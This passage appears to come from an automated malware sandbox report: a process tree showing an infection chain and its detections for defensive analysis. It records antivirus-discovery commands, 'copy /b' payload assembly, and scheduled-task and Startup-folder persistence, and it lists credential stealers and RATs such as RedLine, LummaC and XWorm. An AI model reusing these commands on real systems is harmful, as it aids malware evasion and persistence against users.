                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:04:46:52
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:04:46:53
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:tasklist
                                                        Imagebase:0xd00000
                                                        File size:79'360 bytes
                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:04:46:53
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr /I "wrsa opssvc"
                                                        Imagebase:0xa90000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:04:46:54
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:tasklist
                                                        Imagebase:0xd00000
                                                        File size:79'360 bytes
                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:04:46:54
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                        Imagebase:0xa90000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:04:46:55
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md 591950
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:04:46:55
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr /V "BachelorRayPotentialBeats" Itsa
                                                        Imagebase:0xa90000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:04:46:55
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:04:46:55
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
                                                        Wow64 process (32bit):true
                                                        Commandline:Shipment.pif E
                                                        Imagebase:0x950000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 5%, ReversingLabs
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:12
                                                        Start time:04:46:55
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:choice /d y /t 5
                                                        Imagebase:0xcc0000
                                                        File size:28'160 bytes
                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:04:46:56
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:04:46:56
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:04:46:56
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
                                                        Imagebase:0x4b0000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:04:46:56
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:04:46:56
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:04:46:57
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
                                                        Imagebase:0x7ff7b6fc0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:04:46:58
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
                                                        Imagebase:0x5b0000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 5%, ReversingLabs
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:04:47:06
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
                                                        Imagebase:0x7ff7b6fc0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:04:47:07
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
                                                        Imagebase:0x5b0000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:24
                                                        Start time:04:48:56
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"
                                                        Imagebase:0xc90000
                                                        File size:327'168 bytes
                                                        MD5 hash:0EC1F7CC17B6402CD2DF150E0E5E92CA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 96%, ReversingLabs
                                                        Has exited:true

                                                        Target ID:25
                                                        Start time:04:48:57
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                                                        Imagebase:0x4b0000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:26
                                                        Start time:04:48:57
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:27
                                                        Start time:04:48:57
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                                                        Imagebase:0x730000
                                                        File size:327'168 bytes
                                                        MD5 hash:0EC1F7CC17B6402CD2DF150E0E5E92CA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 96%, ReversingLabs
                                                        Has exited:true

                                                        Target ID:28
                                                        Start time:04:48:59
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        Imagebase:0x730000
                                                        File size:327'168 bytes
                                                        MD5 hash:0EC1F7CC17B6402CD2DF150E0E5E92CA
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:29
                                                        Start time:04:48:59
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                                                        Imagebase:0x4b0000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:30
                                                        Start time:04:48:59
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:31
                                                        Start time:04:48:59
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\1000142101\build2.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"
                                                        Imagebase:0x400000
                                                        File size:492'544 bytes
                                                        MD5 hash:F9A4F6684D1BF48406A42921AEBC1596
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000003.3728665099.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.4162638293.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 82%, ReversingLabs
                                                        Has exited:true

                                                        Target ID:32
                                                        Start time:04:49:02
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"
                                                        Imagebase:0x910000
                                                        File size:104'448 bytes
                                                        MD5 hash:771B8E84BA4F0215298D9DADFE5A10BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 88%, ReversingLabs
                                                        Has exited:true

                                                        Target ID:33
                                                        Start time:04:49:05
                                                        Start date:31/08/2024
                                                        Path:C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
                                                        Imagebase:0xaf0000
                                                        File size:104'448 bytes
                                                        MD5 hash:771B8E84BA4F0215298D9DADFE5A10BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 88%, ReversingLabs
                                                        Has exited:false

                                                        Target ID:34
                                                        Start time:04:49:06
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                                                        Imagebase:0x730000
                                                        File size:327'168 bytes
                                                        MD5 hash:0EC1F7CC17B6402CD2DF150E0E5E92CA
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:35
                                                        Start time:04:49:06
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                                                        Imagebase:0x4b0000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:36
                                                        Start time:04:49:06
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:37
                                                        Start time:04:49:09
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"
                                                        Imagebase:0x400000
                                                        File size:2'846'145 bytes
                                                        MD5 hash:FD2DEFC436FC7960D6501A01C91D893E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 92%, ReversingLabs
                                                        Has exited:false

                                                        Target ID:39
                                                        Start time:04:49:14
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\1000194001\meta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"
                                                        Imagebase:0x7ff617d10000
                                                        File size:2'806'784 bytes
                                                        MD5 hash:3AACE51D76B16A60E94636150BD1137E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 88%, ReversingLabs
                                                        Has exited:true

                                                        Target ID:40
                                                        Start time:04:49:15
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                                                        Imagebase:0x730000
                                                        File size:327'168 bytes
                                                        MD5 hash:0EC1F7CC17B6402CD2DF150E0E5E92CA
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:41
                                                        Start time:04:49:16
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:42
                                                        Start time:04:49:16
                                                        Start date:31/08/2024
                                                        Path:C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
                                                        Imagebase:0xbf0000
                                                        File size:96'256 bytes
                                                        MD5 hash:DB5717FD494495EEA3C8F7D4AB29D6B0
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: Joe Security
                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: ditekSHen
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 84%, ReversingLabs
                                                        Has exited:false

                                                        Target ID:43
                                                        Start time:04:49:19
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"
                                                        Imagebase:0x140000
                                                        File size:330'792 bytes
                                                        MD5 hash:D6FCA3CD57293390CCF9D2BC83662DDA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 96%, ReversingLabs
                                                        Has exited:true

                                                        Target ID:44
                                                        Start time:04:49:19
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                        Imagebase:0x1c0000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:45
                                                        Start time:04:49:21
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                        Imagebase:0x200000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:46
                                                        Start time:04:49:21
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                        Imagebase:0xaa0000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Has exited:false

                                                        Target ID:47
                                                        Start time:04:49:23
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe"
                                                        Imagebase:0x400000
                                                        File size:1'104'936 bytes
                                                        MD5 hash:8E74497AFF3B9D2DDB7E7F819DFC69BA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 100%, ReversingLabs
                                                        Has exited:true

                                                        Target ID:49
                                                        Start time:04:49:24
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                        Imagebase:
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:50
                                                        Start time:04:49:26
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                        Imagebase:0xf90000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:51
                                                        Start time:04:49:26
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                        Imagebase:0xd20000
                                                        File size:65'440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Has exited:true

                                                        Target ID:52
                                                        Start time:04:49:26
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
